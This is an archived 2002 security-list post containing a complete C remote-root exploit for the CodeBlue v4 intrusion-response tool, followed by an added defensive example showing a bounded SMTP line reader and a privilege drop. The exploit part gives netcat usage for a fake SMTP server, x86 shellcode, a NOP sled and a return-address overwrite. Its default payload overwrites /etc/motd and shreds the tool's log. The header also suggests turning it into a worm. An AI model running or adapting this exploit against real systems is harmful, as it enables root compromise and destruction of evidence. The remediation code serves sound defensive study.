codeblue remote root
Source: SecurityVulns, SECURITYVULNS:DOC:2509 (archived via vulners.com)
Date: 2002-02-18

/*
 * Demonstration linux-x86 remote root against codeblue v1.1 (from file header)
 * Otherwise it's known as CodeBlue v4
 *
 * This is rather trivial to exploit...
 *
 * From get_smtp_reply():
 *   "We'll loop infinitely, receiving
 *    1 byte at a time until we receive a carriage return
 *    or line-feed character, signifying the end of the output"
 *
 * The stack looks like
 *
 * int get_smtp_reply(int sd)
 * {
 *   char response[1024];
 *   char reply_message[1024];
 *
 * I probably don't have to mention it, but it reads the response into response,
 * with nothing stopping it once the 1024 bytes are used up.
 *
 * Also, since this is meant to increase security a little, why doesn't it
 * filter non-alphanumeric chars? Also, since it is playing with untrusted
 * data, why doesn't it drop uids, instead of insisting on running as root?
 *
 * if ((userid = getuid()) != 0) {
 *   fprintf(stderr, "uid %d is invalid!\n", userid);
 *   fprintf(stderr, "This program MUST be run as root\n");
 *   exit(1);
 * }
 *
 * Usage: gcc exp.c -o exp; ./exp | nc -l -p 25
 * Now you could do (on another terminal)
 *   printf "GET /default.ida?NNNNNN HTTP/1.0\n\n" | nc remotehost 80
 * and wait until codeblue runs.
 * Granted, nc makes it remote, but why reinvent the wheel?
 * Oh, and by the way, you'll most likely have to change the offset down there.
 *
 * Lots of improvements could (well, have) been done, such as a select(), read(),
 * write(), so you can get a remote terminal... at the moment, all it'll do
 * is make the id command display. Brute force is interesting, because you
 * have to wait until it's run. I suspect, though I haven't tried, you could
 * almost double the nop size by playing around with reply_message.
 *
 * If you had a sense of humour, you probably could turn this into a worm. This
 * is one of the reasons I don't really like automated response/attack software.
 * Or you could just trojan/modify your existing smtp to do this whenever it
 * receives a HELO localhost...
 *
 * The interesting part of this is the bug in codeblue helped me win
 * a wargame. We were given root on a box in a lan, and got to penetrate
 * several others. Since the person running it was sick of being scanned by
 * the various worms, he was running this...
 *
 * Now for the paranoia part, how many of those scans have you received were
 * to check if you were running CodeBlue?
 *
 * laters,
 * -- Andrew Griffiths
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <string.h>

/* The shellcode beats doing a bindshell/connect code, since codeblue already is
 * talking to our (supposed) smtp server, so all we have to do is redirect
 * stdin/out/err to fd 5. (Assuming fd 5 is the smtp connection. It was on
 * mine.)
 */

unsigned char sc[] =
/* dupsh basically, dup2(5, (0,1,2)) */
"\x31\xc0\x89\xc3\x89\xc1\x89\xc2\xb2\x3f\x88\xd0\xb3\x05"
"\xcd\x80\x89\xd0\x41\xcd\x80\x89\xd0\x41\xcd\x80"
/* Standard aleph1 shellcode */
"\xeb\x1d\x5e\x29\xc0\x88\x46\x07\x89\x46\x0c"
"\x89\x76\x08\xb0\x0b\x87\xf3\x8d\x4b\x08"
"\x8d\x53\x0c\xcd\x80\x29\xc0\x40\xcd\x80"
"\xe8\xde\xff\xff\xff/bin/sh";

int main(void)
{
    unsigned char buf[3000];

    memset(buf, 0, 3000);

    /* nop sled, then the shellcode right behind it */
    memset(buf, 0x90, 967);
    strncpy((char *)buf + 967, (char *)sc, strlen((char *)sc));
    fprintf(stderr, "buf: %s\n", buf);
    fprintf(stderr, "strlen(buf): %d\n", (int)strlen((char *)buf));
    /* the offset mentioned in the header; adjust for your target */
    buf[1036] = 0xd0;
    buf[1037] = 0xdf;
    buf[1038] = 0xff;
    buf[1039] = 0xbf;

#ifdef ICANMODIFYCCODEORMODIFYCOMPILETIMEFLAGS
    strcpy((char *)buf + 1040, " id");
#else
    strcpy((char *)buf + 1040,
           " echo warning codeblue has a remote root hole in it "
           ">/etc/motd; shred -z codebluelog 2>/dev/null; rm -f codebluelog 2>/dev/null; "
           "echo you sux. RTFC...");
#endif
    printf("%s", buf);
    return 0;
}
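The header comment above names two defects in codeblue's get_smtp_reply(): a byte-at-a-time read loop with no bound on how much it will store in a 1024-byte stack buffer, and a program that refuses to run as anything but root while parsing untrusted SMTP replies. What follows is an added example written for this page (it is not codeblue's code and not the exploit author's) showing the bounded reader and the privilege drop that would have closed both issues. The function names read_smtp_line, feed_and_read and drop_privileges, the choice to terminate on LF and strip a preceding CR, and the constructed sample replies are this example's own assumptions.

```c
#define _DEFAULT_SOURCE
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <grp.h>
#include <sys/types.h>

/* Bounded counterpart of the byte-at-a-time loop the header describes.
 * Reads until LF (a preceding CR is stripped) but never stores more than
 * cap-1 bytes. Returns the line length on success, -1 on EOF or error before
 * a terminator, and -2 when the line did not fit: the rest of the overlong
 * line is drained so the next call starts on a fresh line rather than on the
 * tail of the oversized one. */
ssize_t read_smtp_line(int fd, char *buf, size_t cap)
{
    size_t n = 0;
    unsigned char c;

    if (cap == 0)
        return -1;
    for (;;) {
        ssize_t r = read(fd, &c, 1);
        if (r == 0)
            return -1;                 /* peer closed before end of line */
        if (r < 0) {
            if (errno == EINTR)
                continue;
            return -1;
        }
        if (c == '\n') {
            if (n > 0 && buf[n - 1] == '\r')
                n--;
            buf[n] = '\0';
            return (ssize_t)n;
        }
        if (n + 1 >= cap) {
            /* Overlong line: keep what fits, discard the rest, report it. */
            buf[cap - 1] = '\0';
            while (read(fd, &c, 1) == 1 && c != '\n')
                ;
            return -2;
        }
        buf[n++] = (char)c;
    }
}

/* Harness (assumed, for demonstration): push a constructed reply through a
 * pipe and read it back with the bounded reader. The pipe stands in for the
 * SMTP socket. */
ssize_t feed_and_read(const char *reply, char *out, size_t cap)
{
    int fds[2];
    size_t len = strlen(reply);
    ssize_t got;

    if (pipe(fds) < 0)
        return -1;
    if (write(fds[1], reply, len) != (ssize_t)len) {
        close(fds[1]);
        close(fds[0]);
        return -1;
    }
    close(fds[1]);                     /* EOF follows the reply */
    got = read_smtp_line(fds[0], out, cap);
    close(fds[0]);
    return got;
}

/* Give up root before touching network data. Order matters: supplementary
 * groups first, then gid, then uid; afterwards confirm root cannot be
 * regained. Refuses a target uid or gid of 0. Returns 0 on success, -1 otherwise. */
int drop_privileges(uid_t uid, gid_t gid)
{
    if (uid == 0 || gid == 0)
        return -1;
    if (setgroups(0, NULL) < 0 || setgid(gid) < 0 || setuid(uid) < 0)
        return -1;
    if (setuid(0) == 0)                /* the drop did not stick */
        return -1;
    return 0;
}

int main(void)
{
    char line[1024];
    /* Constructed replies: a normal one and one far longer than the buffer. */
    char *huge = malloc(3000);
    memset(huge, 'A', 2999);
    huge[2999] = '\0';

    printf("normal: %zd bytes -> \"%s\"\n",
           feed_and_read("250 OK\r\n", line, sizeof line), line);
    printf("overlong: %zd (stored %zu bytes)\n",
           feed_and_read(huge, line, sizeof line), strlen(line));
    free(huge);
    return 0;
}
```

The reader returns a distinct code for an overlong line instead of silently truncating, so a caller can log the event and close the connection; a 3000-byte reply of the kind the exploit above produces ends up as 1023 stored bytes and a -2, not as an overwritten return address. drop_privileges() only makes sense when the process actually starts as root, which is why the demonstration main does not call it.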

